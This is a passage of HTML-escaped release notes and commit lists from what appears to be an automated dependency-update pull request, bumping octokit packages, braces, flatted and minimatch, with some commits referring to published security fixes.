href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/687\"\u003e#687\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/0e236cb76f82cfc073b381802e4fea03f59c213c\"\u003e\u003ccode\u003e0e236cb\u003c/code\u003e\u003c/a\u003e feat: new Projects v2 endpoints, new code scanning dismissal endpoints, many ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/bf19e3ed5f5e833712d2663984c4ce456696e93e\"\u003e\u003ccode\u003ebf19e3e\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency prettier to v3.6.2 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/685\"\u003e#685\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/4f9fc562b1dda9d8f724e8ffee444141c2f45673\"\u003e\u003ccode\u003e4f9fc56\u003c/code\u003e\u003c/a\u003e ci(action): update actions/setup-node action to v5 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/688\"\u003e#688\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/8e5da25f975d2f31dda6b8b588d71f2c768a8df2\"\u003e\u003ccode\u003e8e5da25\u003c/code\u003e\u003c/a\u003e fix: handle url in response when using pagination with compareCommits (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/686\"\u003e#686\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/6d8ea8ad68058e45883a1a7edaaf6d8a91d732bd\"\u003e\u003ccode\u003e6d8ea8a\u003c/code\u003e\u003c/a\u003e feat: add paginatantion support for  \u003ccode\u003ecompareCommits\u003c/code\u003e and `compareCommitsWith...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/8ec2713699ee473ee630be5c8a66b9665bcd4173\"\u003e\u003ccode\u003e8ec2713\u003c/code\u003e\u003c/a\u003e fix(deps): update \u003ccode\u003e@octokit/types\u003c/code\u003e - no new paginated endpoints (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/680\"\u003e#680\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v2.21.3...v14.0.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/request` from 5.6.3 to 10.0.8\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/request.js/releases\"\u003e\u003ccode\u003e@​octokit/request\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev10.0.8\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.7...v10.0.8\"\u003e10.0.8\u003c/a\u003e (2026-02-20)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003euse \u003ccode\u003ejson-with-bigint\u003c/code\u003e instead of built-in JSON methods in order to properly support int64's (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/798\"\u003e#798\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/f13f5d9814cec9e51cdbe57e3864f9a7f95a9731\"\u003ef13f5d9\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.7\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.6...v10.0.7\"\u003e10.0.7\u003c/a\u003e (2025-11-13)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ereadme:\u003c/strong\u003e properly structure the options for custom agent (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/786\"\u003e#786\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/f17c1c13c7cba81187c419da06b815ed741c950c\"\u003ef17c1c1\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/octokit/request.js/issues/785\"\u003e#785\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.6\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.5...v10.0.6\"\u003e10.0.6\u003c/a\u003e (2025-10-30)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v16 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/783\"\u003e#783\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/1aeac5672c04bc508e46796660465b1b67cf397c\"\u003e1aeac56\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.5\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.4...v10.0.5\"\u003e10.0.5\u003c/a\u003e (2025-09-29)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update octokit deps (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/772\"\u003e#772\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/30f83b64578eebf6988b44df495d235de8136e6e\"\u003e30f83b6\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.4\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.3...v10.0.4\"\u003e10.0.4\u003c/a\u003e (2025-09-29)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v15 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/775\"\u003e#775\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/ad78b4c8099a790d9ac3489342021896cabdbecd\"\u003ead78b4c\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.3\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.2...v10.0.3\"\u003e10.0.3\u003c/a\u003e (2025-06-20)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003epkg:\u003c/strong\u003e unreplaced version number in \u003ccode\u003edist-bundle/\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/765\"\u003e#765\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/5b181af867a6b3ccfd23800d876ff22e1e54fd7d\"\u003e5b181af\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.1...v10.0.2\"\u003e10.0.2\u003c/a\u003e (2025-05-20)\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/f13f5d9814cec9e51cdbe57e3864f9a7f95a9731\"\u003e\u003ccode\u003ef13f5d9\u003c/code\u003e\u003c/a\u003e fix: use \u003ccode\u003ejson-with-bigint\u003c/code\u003e instead of built-in JSON methods in order to prop...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/9ba6ae0fd2eff35a6c29a9f032eca6e9ba002976\"\u003e\u003ccode\u003e9ba6ae0\u003c/code\u003e\u003c/a\u003e Document that unsuccessful HTTP status code result in an exception (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/795\"\u003e#795\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/7160b8201ee183d57e3572c9ac78aa3f241c9468\"\u003e\u003ccode\u003e7160b82\u003c/code\u003e\u003c/a\u003e chore(deps): replace glob with tinyglobby (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/791\"\u003e#791\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/ab8018b6d42de25adb305e3ea5ea840ee2805481\"\u003e\u003ccode\u003eab8018b\u003c/code\u003e\u003c/a\u003e ci(action): update peter-evans/create-or-update-comment action to v5 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/776\"\u003e#776\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/fb916e454df205980835281368da81a003cde30d\"\u003e\u003ccode\u003efb916e4\u003c/code\u003e\u003c/a\u003e build(deps): bump vite from 6.3.4 to 6.4.1 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/780\"\u003e#780\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/e1eb7693969a87cbdde278c82a7474b8acec9207\"\u003e\u003ccode\u003ee1eb769\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency esbuild to ^0.27.0 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/784\"\u003e#784\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/f17c1c13c7cba81187c419da06b815ed741c950c\"\u003e\u003ccode\u003ef17c1c1\u003c/code\u003e\u003c/a\u003e fix(readme): properly structure the options for custom agent (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/786\"\u003e#786\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/ea46fa9cd46f970fad5e286e6fdd2ea46929ac5d\"\u003e\u003ccode\u003eea46fa9\u003c/code\u003e\u003c/a\u003e ci(action): update github/codeql-action action to v4 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/778\"\u003e#778\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/8166d281814326b3e11d60b1895e623f2fd51c9e\"\u003e\u003ccode\u003e8166d28\u003c/code\u003e\u003c/a\u003e chore(deps): update vitest monorepo to v4 (major) (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/781\"\u003e#781\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/1aeac5672c04bc508e46796660465b1b67cf397c\"\u003e\u003ccode\u003e1aeac56\u003c/code\u003e\u003c/a\u003e fix(deps): update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v16 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/783\"\u003e#783\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/octokit/request.js/compare/v5.6.3...v10.0.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by [GitHub Actions](\u003ca href=\"https://www.npmjs.com/~GitHub\"\u003ehttps://www.npmjs.com/~GitHub\u003c/a\u003e Actions), a new releaser for \u003ccode\u003e@​octokit/request\u003c/code\u003e since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/request-error` from 2.1.0 to 7.1.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/request-error.js/releases\"\u003e\u003ccode\u003e@​octokit/request-error\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.1.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v7.0.2...v7.1.0\"\u003e7.1.0\u003c/a\u003e (2025-11-13)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003einherit options from base \u003ccode\u003eError\u003c/code\u003e class to add support for the \u003ccode\u003ecause\u003c/code\u003e property (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/535\"\u003e#535\u003c/a\u003e/\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/536\"\u003e#536\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/2ea27805b93ed21d8cc423a6ad436513ecca0b55\"\u003e2ea2780\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.0.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v7.0.1...v7.0.2\"\u003e7.0.2\u003c/a\u003e (2025-10-30)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v16 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/533\"\u003e#533\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/e5a75ef9cdede512185df71ffe5117c2b71027a9\"\u003ee5a75ef\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.0.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v7.0.0...v7.0.1\"\u003e7.0.1\u003c/a\u003e (2025-09-29)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v15 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/522\"\u003e#522\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/4a453f21afbde9fc19d779518cb8e5f23d05038f\"\u003e4a453f2\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.0.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v6.1.8...v7.0.0\"\u003e7.0.0\u003c/a\u003e (2025-05-20)\u003c/h1\u003e\n\u003ch3\u003eContinuous Integration\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003estop testing against NodeJS v18 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/512\"\u003e#512\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/8eee0c1eff4f247b714da5db9437787507e124df\"\u003e8eee0c1\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBREAKING CHANGES\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eDrop support for NodeJS v18\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003ebuild: set minimal node version in build script to v20\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eci: stop testing against NodeJS v18\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev6.1.8\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v6.1.7...v6.1.8\"\u003e6.1.8\u003c/a\u003e (2025-04-10)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v14 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/505\"\u003e#505\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/ab4ea7b81bd8055060bfafa47b7eb13d89c7e475\"\u003eab4ea7b\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev6.1.7\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/2ea27805b93ed21d8cc423a6ad436513ecca0b55\"\u003e\u003ccode\u003e2ea2780\u003c/code\u003e\u003c/a\u003e feat: inherit options from base \u003ccode\u003eError\u003c/code\u003e class to add support for the \u003ccode\u003ecause\u003c/code\u003e ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/ac7b3094475260d5bc95951d2040e38da8e88dd8\"\u003e\u003ccode\u003eac7b309\u003c/code\u003e\u003c/a\u003e chore(deps): update vitest monorepo to v4 (major) (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/531\"\u003e#531\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/dadc76ddc454c475f07525a8cd96fc29e4353cb1\"\u003e\u003ccode\u003edadc76d\u003c/code\u003e\u003c/a\u003e ci(action): update peter-evans/create-or-update-comment action to v5 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/525\"\u003e#525\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/f57f2e6b6fdc3578c3484c8939bcf56548b620eb\"\u003e\u003ccode\u003ef57f2e6\u003c/code\u003e\u003c/a\u003e build(deps): lock file maintenance (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/534\"\u003e#534\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/e5a75ef9cdede512185df71ffe5117c2b71027a9\"\u003e\u003ccode\u003ee5a75ef\u003c/code\u003e\u003c/a\u003e fix(deps): update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v16 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/533\"\u003e#533\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/e5d5de21540843d46e1dbd15696af8bdff9cf400\"\u003e\u003ccode\u003ee5d5de2\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency \u003ccode\u003e@​types/node\u003c/code\u003e to v24 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/532\"\u003e#532\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/8cc127bf725e581cdd32336669d322632e4392b4\"\u003e\u003ccode\u003e8cc127b\u003c/code\u003e\u003c/a\u003e ci(action): update actions/setup-node action to v6 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/529\"\u003e#529\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/b3a876bc68c0d044bf52eeaa513760e362d426e8\"\u003e\u003ccode\u003eb3a876b\u003c/code\u003e\u003c/a\u003e build(deps): lock file maintenance (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/527\"\u003e#527\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/cf1817b2c1bd15ffbf26bbf4390aa07084a10fce\"\u003e\u003ccode\u003ecf1817b\u003c/code\u003e\u003c/a\u003e ci(action): update github/codeql-action action to v4 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/528\"\u003e#528\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/61f1e8750fa8c1b7b57f4323ab13b92bb1017cf2\"\u003e\u003ccode\u003e61f1e87\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency tinybench to v5 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/519\"\u003e#519\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/octokit/request-error.js/compare/v2.1.0...v7.1.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nRemoves `@tootallnate/once`\n\nUpdates `braces` from 3.0.2 to 3.0.3\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/74b2db2938fad48a2ea54a9c8bf27a37a62c350d\"\u003e\u003ccode\u003e74b2db2\u003c/code\u003e\u003c/a\u003e 3.0.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/88f1429a0f47e1dd3813de35211fc97ffda27f9e\"\u003e\u003ccode\u003e88f1429\u003c/code\u003e\u003c/a\u003e update eslint. lint, fix unit tests.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/415d660c3002d1ab7e63dbf490c9851da80596ff\"\u003e\u003ccode\u003e415d660\u003c/code\u003e\u003c/a\u003e Snyk js braces 6838727 (\u003ca href=\"https://redirect.github.com/micromatch/braces/issues/40\"\u003e#40\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/190510f79db1adf21d92798b0bb6fccc1f72c9d6\"\u003e\u003ccode\u003e190510f\u003c/code\u003e\u003c/a\u003e fix tests, skip 1 test in test/braces.expand\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/716eb9f12d820b145a831ad678618731927e8856\"\u003e\u003ccode\u003e716eb9f\u003c/code\u003e\u003c/a\u003e readme bump\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/a5851e57f45c3431a94d83fc565754bc10f5bbc3\"\u003e\u003ccode\u003ea5851e5\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/micromatch/braces/issues/37\"\u003e#37\u003c/a\u003e from coderaiser/fix/vulnerability\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/2092bd1fb108d2c59bd62e243b70ad98db961538\"\u003e\u003ccode\u003e2092bd1\u003c/code\u003e\u003c/a\u003e feature: braces: add maxSymbols (\u003ca href=\"https://github.com/micromatch/braces/issues/\"\u003ehttps://github.com/micromatch/braces/issues/\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/9f5b4cf47329351bcb64287223ffb6ecc9a5e6d3\"\u003e\u003ccode\u003e9f5b4cf\u003c/code\u003e\u003c/a\u003e fix: vulnerability (\u003ca href=\"https://security.snyk.io/vuln/SNYK-JS-BRACES-6838727\"\u003ehttps://security.snyk.io/vuln/SNYK-JS-BRACES-6838727\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/98414f9f1fabe021736e26836d8306d5de747e0d\"\u003e\u003ccode\u003e98414f9\u003c/code\u003e\u003c/a\u003e remove funding file\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/665ab5d561c017a38ba7aafd92cc6655b91d8c14\"\u003e\u003ccode\u003e665ab5d\u003c/code\u003e\u003c/a\u003e update keepEscaping doc (\u003ca href=\"https://redirect.github.com/micromatch/braces/issues/27\"\u003e#27\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/micromatch/braces/compare/3.0.2...3.0.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `flatted` from 3.2.7 to 3.4.2\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/3bf09091c3562e17a0647bc06710dd6097079cf7\"\u003e\u003ccode\u003e3bf0909\u003c/code\u003e\u003c/a\u003e 3.4.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/885ddcc33cf9657caf38c57c7be45ae1c5272802\"\u003e\u003ccode\u003e885ddcc\u003c/code\u003e\u003c/a\u003e fix CWE-1321\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/0bdba705d130f00892b1b8fcc80cf4cdea0631e3\"\u003e\u003ccode\u003e0bdba70\u003c/code\u003e\u003c/a\u003e added flatted-view to the benchmark\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/2a02dce7c641dec31194c67663f9b0b12e62da20\"\u003e\u003ccode\u003e2a02dce\u003c/code\u003e\u003c/a\u003e 3.4.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/fba4e8f2e113665da275b19cd0f695f3d98e9416\"\u003e\u003ccode\u003efba4e8f\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/WebReflection/flatted/issues/89\"\u003e#89\u003c/a\u003e from WebReflection/python-fix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/5fe86485e6df7f7f34a07a2a85498bd3e17384e7\"\u003e\u003ccode\u003e5fe8648\u003c/code\u003e\u003c/a\u003e added \u0026quot;when in Rome\u0026quot; also a test for PHP\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/53517adbefe724fe472b2f9ebcdb01910d0ae3f0\"\u003e\u003ccode\u003e53517ad\u003c/code\u003e\u003c/a\u003e some minor improvement\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/b3e2a0c387bf446435fec45ad7f05299f012346f\"\u003e\u003ccode\u003eb3e2a0c\u003c/code\u003e\u003c/a\u003e Fixing recursion issue in Python too\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/c4b46dbcbf782326e54ea1b65d3ebb1dc7a23fad\"\u003e\u003ccode\u003ec4b46db\u003c/code\u003e\u003c/a\u003e Add SECURITY.md for security policy and reporting\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/f86d071e0f70de5a7d8200198824a3f07fc9c988\"\u003e\u003ccode\u003ef86d071\u003c/code\u003e\u003c/a\u003e Create dependabot.yml for version updates\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/WebReflection/flatted/compare/v3.2.7...v3.4.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `minimatch` from 3.1.2 to 3.1.5\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/7bba97888a27a6162983056bcce2a6e28f668712\"\u003e\u003ccode\u003e7bba978\u003c/code\u003e\u003c/a\u003e 3.1.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/bd259425b2ca17b42897997f93e890314155522d\"\u003e\u003ccode\u003ebd25942\u003c/code\u003e\u003c/a\u003e docs: add warning about ReDoS\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/1a9c27c75725474dbde57db2995b6281b267756d\"\u003e\u003ccode\u003e1a9c27c\u003c/code\u003e\u003c/a\u003e fix partial matching of globstar patterns\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/1a2e084af579731af66c221214e3ca8222c9bf23\"\u003e\u003ccode\u003e1a2e084\u003c/code\u003e\u003c/a\u003e 3.1.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/ae24656237c3d58067442f790ce17eff84463a47\"\u003e\u003ccode\u003eae24656\u003c/code\u003e\u003c/a\u003e update lockfile\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/b1003749228b2a79e1f237963a0d559ef7a0941e\"\u003e\u003ccode\u003eb100374\u003c/code\u003e\u003c/a\u003e limit recursion for **, improve perf considerably\u003c/li\u003e\n\u003cli\u003e\u003ca 